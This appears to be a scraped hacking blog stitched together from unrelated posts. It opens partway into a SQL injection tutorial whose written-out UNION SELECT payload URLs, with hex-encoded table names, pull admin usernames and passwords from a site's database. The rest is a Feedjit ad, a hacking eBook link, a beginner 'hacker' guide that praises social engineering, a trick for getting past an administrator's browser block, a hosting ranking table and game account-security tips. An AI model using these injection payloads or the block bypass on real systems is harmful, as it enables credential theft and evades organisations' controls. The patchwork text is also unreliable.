+from+information_schema.columns where table_name=TableNameHEX

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=Admin

Now the above will return an error because of the way the command is used at the end of the URL (where table_name=Admin)
We must HEX the table name, in this case Admin
I use THIS website to for converting Text to Hex.

The HEX of Admin is: 41646d696e
Now we must add 0x (MySQL integer) at the front of the HEX, which should now look like this: 0x41646d696e
And pop it onto the end of the URL replacing Admin, so the URL should look something like the following.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x41646d696e

Now all columns from the table Admin will be displayed on the page, just the same as version 4 we will use the same command to extract data from certain columns within the table.

Say for instance the following columns were displayed:
username, password, id, admin_user

We would be able to do the same as version 4, replacing the vulnerable column (2) with a column name (one of the above) i.e. username and password using the concat() function.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,concat(username,0x3a,password),3+from+Admin

Will display the first username and password data entries from the columns username and password in the table Admin.

You can still use group_concat() & limit 0,1
Exactly the same as version 4.

Know when your friends and clients visit you.

Feedjit lets you see friends and visitors as they arrive on your blog or website. Know when your best friends read about your latest adventure. Be alerted when your most important clients view your latest product offering. Feedjit lets you know, right now, who is visiting your site. Simply add the Live Traffic Feed and instantly start seeing who is visiting your site as they arrive.
“Feedjit Pro lets you see your visitor’s journey from beginning to end and understand how they experienced your site.”

See the actual identity of hundreds of thousands of Feedjit members when they visit your site including their photo and links to their website and social profiles. You can make new friends and leads by contacting the Feedjit members who visit your site. The Live Traffic Feed turns your unknown readers into real people.

Our basic Live Traffic Feed is completely free and is ad supported. There is no trial period or credit card required. With the basic Live Traffic Feed you get a free real-time view of your site traffic. You can see all anonymous visitors arriving in real-time and the identities of Feedjit members who visit your site. You can also customize the colors of the feed to exactly match your blog or website theme.

Feedjit Advanced keeps up with your creativity and is free of ads. Match the theme of your site and easily fit your site design by choosing the number of visitors to display. As an Advanced user you even have the option to remove Feedjit branding and menus. Advanced users can watch visitors arriving from websites and search engines in real-time.

Feedjit Pro lets you see your visitor’s journey from beginning to end and understand how they experienced your site. Pro bloggers want to know even more about their visitors. Imagine being able to watch a person travel through your site as they visit each page. You can see how long they stayed on each page before clicking through to the next. Feedjit Pro includes all the features of Feedjit Advanced.

Feedjit Pro lets you opt to keep your visitor information private with a hidden Live Traffic Feed. We provide priority customer support to get you up and running fast. You can keep on top of important events happening on your site with real-time email alerts such as when you get a visitor from a new country or if a particular page on your site was just viewed.

Pro lets you analyze your visitor information in detail with advanced real-time graphs and charts. Dive into the specifics of which search engines and keyword searches send you the most traffic, how many new versus returning visitors visited in the last hour, which pages are the most popular on your site and many other graphs.

With Feedjit Pro you also have full access to all the Feedjit Advanced options to personalize the Live Traffic Feed.
Where Did I get it from?

To be honest with you, I don't even recall the original source of this eBook, but I do know it is a very good and basic one.

What does it cover?
-Where to start
-Needed Programming
-Linux and how to use it
-Password Cracking and Hacking
-Network Hacking [footprinting, etc...]
-Wireless Hacking
-Windows Hacking
-Malware
-Web Hacking



Download : http://www.mediafire.com/?bzul2p28d15mgx5
---------------------------------------------------------------------------------------------------------------------------------------------
Table of contents


Introduction
Respect
What to Learn
Style
Further Resources
Credits


Introduction


There are an infinite amount of people in the world. Everyone is different. There are no duplicates. The same can be said in the world of hackers. Not all hackers are the same, and a lot of hackers have different views on “Hacking”, but it is not the fact that we are all identical that makes us one entity; it is the big idea. See, what makes us hackers is the desire to learn, the urge to tweak any object we encounter, we want control, we don’t want to be controlled, we want to be anonymous, and we are intellectually years ahead of others; I would go on on this list if boredom didn’t exist. So, how do you know if you have the “Hacker Mindset”?
Read this document. It is titled “The Hacker Manifesto”.



Respect


One of my favorite things about the hacker community is how open it is to anyone. Quoted from the Hacker Manifesto “We exist without skin color, without nationality, without religious bias” In your days of being a hacker you will make friends from more than one country, you will meet someone that is a different religion than you, and you will encounter numerous people with a different mindset than you; but it doesn’t matter. You, as well as them, will be accepted as long as you follow the basic guidelines.

But, you don’t come into the hacker community as the best. Do not expect to be treated as a god when it is your first day. It takes work to earn the respect of a great hacker (i.e. Dennis Ritchie, Ken Thompson, Kevin Mitnick, or Phiber Optik). There are three main categories of hackers, and they are:

Script-Kiddies: These are the people who use other people’s tools and documents/resources available online. Script-kiddies usually have no idea what is going on ‘behind the scenes”, they just run their programs because they know that they work. These hackers usually have minimal skill level, but take up a large portion of the hacker community.

Intermediate Hackers: These are the halfway hackers. Intermediate hackers know quite a bit more than script-kiddies, and are decent enough to get by by themselves. They know about computers and networks, and use well-known exploits. A lot of halfway hackers want to be masters, and with the appropriate amount of work and dedication, they can be.

Elite Hackers: These are the skilled hacking experts. Elite hackers code many of the programs the the script-kiddies use, and develop exploits that intermediate hackers use. They can hack into almost any system, and cover their tracks, and sometimes, even make it look like someone else did it. They are often very secretive and only share their information with “subordinates” when they are deemed worthy. Elite hackers are very few in numbers, which is good for security companies.

There are many things that you have to learn to reach that glorious “Elite Hacker” status. Every hacker must make their own path, but in this tutorial I will attempt to help you achieve this goal to my greatest ability.
So, what can you do to up your status a little bit? Well there are plenty of things:

Write useful software
Help debug other peoples programs
Publish useful information
Server other hackers

One word that I used more than once on that list was “useful”. That is what will earn you some status in the hacker culture; being useful. Don’t just be there, be there and do something.

What to Learn

There are so many things that you need to learn in order to be a successful hacker, it is almost overwhelming. But I will try to sum this up for you:
Security (PC & Network)
Website Hacking (SQLi/XSS/etc.)
The Jargon (Slang)
Social Engineering (Human Hacking)
Encryption
WiFi Hacking
Linux/Unix
Programming (Any language)

There are things that can and should be added to that list, and it is by no means in order. This is not a tutorial on how to do each and every one of the things on this list, but it is here to point you in the right direction.

If I were to tell you where to start-- assuming that you have very little experience-- I would tell you to learn html. This is not meant to be your main programming language (unless you get unbelievably good at it), but it is a great starting point. Html will help you understand a lot of the problems that you will encounter online, and if there is ever a point where you would like to make a website, it would help you there too.

If I were to tell you where to go from there, I would tell you to learn a minimal amount of batch coding. This field is very much meant for beginners, and most hackers start out just trying to learn more about it (which then develops in to much more useful skills). Batch is just Command Prompt and Notepad. Watch some tutorials on YouTube, or look at the Batch ,Shell, Dos and Command Line Interpreters section (http://www.hackforums.net/forumdisplay.php?fid=49). Learning this won’t make you an Elite Hacker, but it will get you used to two things:

Basic Programming
Basic Command Line

Programming will help you all around, but the command line is mostly for Linux. If you don’t already know, Linux is an operating system. Linux is evolved from the Unix Operating system, which was developed in 1969-- That’s 12 years before windows! Linux was released in 1991 by Linus Torvalds. Linux actually stands for “Linux is not Unix”. Now, if you are still reading after that boring history lesson, then that means you are showing a great virtue that every hacker needs.... Patience. I would advise you to head on down to http://www.ubuntu.com/download and pick up your own version of Linux. NOTE: Linux will run side by side with windows, you can have two operating systems on one machine.

Social Engineering is another thing that is vital for you to become a successful hacker. Social Engineering is the art of human hacking, and is often abbreviated at SE. It will do countless things for you in your career. See, flaws in a computer network get patched, but human flaws will never diminish. Kevin Mitnick was said to be one of the greatest social engineers ever. Kevin could convince anyone that he was someone else-- whether it be on the phone, or emailing, he was perfect at getting his way. The great thing about social engineering is that you can use it in everyday life, wherever you go. Out of all the skills that you could learn to be a great hacker, this may be one of the most important.

Style

Hackers can’t always be at the computer, and although there is no real substitute for hacking, there are plenty of things that you can do to that can do to feel somewhat connected to the art of hacking.

Learn to write well: Hackers aren’t like the media makes it seem where you only are allowed to talk in numbers. Most great hackers have near-perfect grammar and spelling. It will also help people understand you better (this is especially useful if English isn’t your main language. And I know by experience that it will earn you some more respect as well.
Watch Star Trek: It’s just a great movie. There are all of the T.V. episodes too, but the movie was awesome.

Mystery books are a good thing: A lot of hackers will tell you to read sci-fi, but mystery books make you think. Thinking is good.

Nerd? Don’t worry about it: As mentioned earlier, real hackers don’t care if you are a nerd. We exist without a bias, and most people follow that golden rule. Anyone who doesn’t isn’t a real hacker.

Meditate: It may seem weird if you have never done it before, but meditation will make you a ridiculously better person. If I was to recommend you a guide for mediation, it would be http://www.amazon.com/Minute-Meditation-...689&sr=8-1

Have an ear for music: Learn to appreciate more than one style of music. Most hackers prefer either rap, or techno (dubstep) and some develop a love for both. The ability to enjoy any music though, is a great trait.

Be a genius: I always strive to be a genius, no matter how much of a stretch it may be. It keeps your mind active, and it will make you, obviously, smarter. Being a genius will make it infinitely easier to learn about hacking, and it will make you much more aware of everything going on around you.

If there is one thing that you shouldn’t do however, is use silly/immature screen names. How respected do you think you will be if your name is “I_Rape_Yung_P00dles”? You won’t ever be taken seriously like that, and it makes you look like a waste of time. Another thing that you should avoid doing is flaming. I am not saying that you should be a brownnoser to everyone that you meet, but avoiding conflicts, and decent amount of respect for the people who deserve it will make you a well liked hacker.

Further Resources


http://www.catb.org/~esr/faqs/hacker-howto.html This is the document that I read that got me started hacking. It is a great starting point.

http://www.google.com/ This website is very secret, and not many people know about it. It will answer any question that you will have on your journey.

http://whatishacking.org/ Is a small site with the purpose of showing the world hacking isn’t bad. It has a couple of the same resources listed here.

http://www.mithral.com/~beberg/manifesto.html The hacker manifesto. This was listed in the document as well.

http://www.social-engineer.org/ Social Engineering hub

http://www.amazon.com/Social-Engineering...0470639539 A great Social Engineering book

Credits


This guide was made entirely by Eminent. If you see this posted by anyone else, please notify me. If any of the links are ever faulty, please post in this thread, and I will fix it as soon as possible. If you have any requests for a guide then contact me and there is a great chance that I will do that for you, if not, then I will reference you to a guide that I know is better than one that I could write. Anyone who needs help further than this then I will gladly assist you (Note: I will not help you if you have not read this thread. I will not help you if you have not tried everything in this thread first).

Surf the web without any Internet Browser!

Ever find yourself sitting in front of a computer where Internet Explorer or Firefox was blocked by IT Administrator, and restricted you from installing any software? If that PC is running Windows XP, then there is chance for you to still surf Internet. Just follow these simple steps:

Open Calculator, Start> Program Files> Accessories> Calculator or press Windows+R and type ‘calc’ in the run box, click OK.
In Calculator, go to Help> Help Topics.
Right click on the left hand side of the title bar and click on ‘Jump to URL’.
Type in the URL and make sure include the ‘http://’ at the beginning.


Note:
Basically what you are looking at is Internet Explorer 6 inside a help window, but this version of program isn’t quite smart as Internet 6. This was tested in Windows XP SP2 with Internet Explorer 6 and I’m not sure whether it will works in Internet Explorer 7 installed computer.

Hacking and Stuff

Ok so guys i wil be adding a Section on this blog on how to hack :O!! Enjoy >:)
http://www.w3schools.com/

http://www.Cplusplus.com


Two Great websites to start learning

Html and C++

I will be giving away Some C++ Ebooks so stay tune ^^
Rank Web Hosting Provider Features Bonus Features Hosting Review
1 Inmotion web hosting rating - 5 stars
Best Business Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $5.95 Free Domain Name,
Choice of Data Centers,
Top Technical Support Inmotion Review
Host Rating: 98%
Rate and Review a Host Rate Inmotion

2 WebHostingHub web hosting rating - 5 stars
Best Unlimited Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $3.95 Free Domain Name,
Host Unlimited Domains,
24/7/365 U.S. Support WebHostingHub Review
Host Rating: 98%
Rate and Review a Host Rate WebHostingHub
3 iPage web hosting rating - 4.5 stars
Trusted Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $4.50 Host Unlimited Domains,
Anytime Moneyback,
$400 of FREE Extras iPage Review
Host Rating: 96%
Rate and Review a Host Rate iPage
4 WebHostingPad web hosting rating - 4.5 stars
Cheap Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $1.99 Free Domain Forever,
Host Unlimited Domains,
$100 Marketing Bonus WebHostingPad Review
Host Rating: 95%
Rate and Review a Host Rate WebHostingPad
5 HostGator web hosting rating - 4 stars
Reliable Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $3.71 Free Instant Setup,
Host Unlimited Domains,
45 Day Refund Period HostGator Review
Host Rating: 95%
Rate and Review a Host Rate HostGator
6 FatCow web hosting rating - 4 stars
Cheap Business Hosting Space: Unlimited
Traffic: Unlimited
Price: $4.67 Free Domain Forever,
Host Unlimited Domains,
$75 Marketing Bonus FatCow Review
Host Rating: 95%
Rate and Review a Host Rate FatCow
7 JustHost web hosting rating - 4 stars
Cheap Professional Hosting Space: Unlimited
Traffic: Unlimited
Price: $4.45 Free Domain Forever,
Host Unlimited Domains,
$100 Marketing Bonus JustHost Review
Host Rating: 94%
Rate and Review a Host Rate JustHost
8 GreenGeeks web hosting rating - 4 stars
300% Green Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $4.95 Free Domain Name,
Host Unlimited Domains,
FREE Site Builder GreenGeeks Review
Host Rating: 94%
Rate and Review a Host Rate GreenGeeks
9 Bluehost web hosting rating - 3.5 stars
Cheap Shared Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $6.95 Free Domain Forever,
Host Unlimited Domains,
$75 Marketing Bonus Bluehost Review
Host Rating: 93%
Rate and Review a Host Rate Bluehost
10 Hostmonster web hosting rating - 3.5 stars
Cheap Shared Web Hosting Space: Unlimited
Traffic: Unlimited
Price: $5.95 Free Domain Forever,
Host Unlimited Domains,
$75 Marketing Bonus Hostmonster Review
Host Rating: 93%
Rate and Review a Host Rate Hostmons

Thank you

Thank you guys For reading my posts thank you very much
Afraid of your soul being stolen are you, youngling? Nay, I'll not steal it, but there are those who will, yes, those who will ...

Is it still paranoia if they really are out to get you?

The first thing to remember in all of this: It is unlikely that anyone will truly try to hack you, or anyone, in the sense of an attack through Nexon's servers. If they do, risking a felony conviction, they'll be after something more worthwhile than your game characters: credit card numbers, business information to sell to Nexon's competitors, or whatever. But not your characters or their stuff. What people call "hacking"in Nexus might better be called "password theft". Nearly all of it takes place because someone is conned into giving their character passwords to someone else.

However, there are some people who will take a technical approach, such as trying to persuade or trick you into installing a so-called "trojan horse" program, to get by stealth what you will not give them. This is a threat anywhere, not just in regard to Nexus, so taking some care to avoid it is well worth your while. $30 for a trojan sniffer or $40 for an anti-virus program might seem extreme, but how much would you pay to get your data back after some jerk trashed your system?

Some of the precautions people have suggested, such as not going to any websites at all, for any reason, are extreme. Sure, barricading yourself in your basement will generally keep you from getting mugged, but do you want to live that way? The solution isn't to walk down the street in the bad part of town flashing a roll of hundreds, nor cower in your basement for the rest of your life, but take sensible precautions without giving way to hysteria. You CAN avoid these creeps. It takes a bit of common sense and some common software.

First of all, things you MUST HAVE:

A good anti-virus program. I use Norton's. Yes, go pay for it! Update it at least once a month, once a week is better. No, anti-virus programs won't catch all trojans, but they do nab the common ones.

A trojan scanner. Go to www.moosoft.com and download The Cleaner. It has a 30 day free trial, $29.95 to register. If this saves your multi-year, multi-hundred-dollar investment in your Nexus character (remember Law 33: getting hacked is a crime) it's cheap insurance.

A firewall. Go to www.zonelabs.com and download the free version of ZoneAlarm. Yes, it's free for personal use, as a promo for their bigger, better, fancier business version. It's also a very highly rated firewall.

Next, some things you MUST DO:

Turn OFF the "Hide file extensions for known file types" option. This can be changed in Windows Explorer (NOT Internet Explorer) under View | Folder Options, on the View tab. ON is the default setting, which makes it easy for people to send you something.jpg.exe and slip you a trojan without you knowing it.

Turn OFF file & printer sharing unless there is some essential reason why you absolutely must leave it on. This is even more important if you are on a cable connection -- that's basically a LAN, and you probably don't want to share your computer with a few hundred of your neighbors.

Turn OFF auto-install, auto-download, auto-backscratch, etc. in your Web browser. Do not let it download or run anything without getting your permission first.

Turn OFF Java support in your Web browser. (JavaScript is ok) If you absolutely need Java for a particular website, turn it on, and back off when you're done. It has some major security holes, especially in Internet Explorer.

Use non-Microsoft email software. Outlook and Outlook Express are especially vulnerable to macro virii, such as the "I love you" virus of recent memory. Eudora Lite is good, fast, and free.

Set the default application for .DOC files to WordPad instead of Word. WordPad has no scripting capabilities, so it's safe from macro virii.

One big thing you MUST NOT DO:
Never, ever, ever use the same password for your Nexus characters that you do for anything else. Don't use the same password for your email account that you do for anything else. Don't use the same password for any two of your characters either. That way, if one password is compromised, the rest are still safe.

Finally, things you MUST REMEMBER:

Nexon will never ask for your password. It is truly mind-blowing, the number of people who still fall for that scam. Nexon absolutely positively does not ever need your password to do anything they want to. Nexon owns the servers. The root user is God!

If something sounds too good to be true, it is. Random strangers don't give away something for nothing. ("Come here, little girl, I have some candy for you...") There is no software, anywhere, that can level you, make you rich, etc.

Remember what they taught you in health class? When you have sex with someone, you're having sex with everyone they've ever been with. Computer security is the same way: When you trust someone, you are trusting everyone they have ever trusted. If one of those people's security was compromised, yours is too. Many of the victims of trojans have been sent to the hostile website or given the trojan itself by hacked friends.

It's a long list, but most of it can be done in just a few minutes. Don't be paranoid -- but be safe.
Useful websites:

Gibson Research -- Shields Up! online port scanner, security information
Zone Labs -- ZoneAlarm free firewall
MooSoft -- TheCleaner trojan scanner/remover
Symantec -- Norton Anti-Virus publisher; virus/trojan info library
McAfee Inc. -- online virus scan and virus/trojan info library
Computer Emergency Response Team -- up-to-date virus and security information
top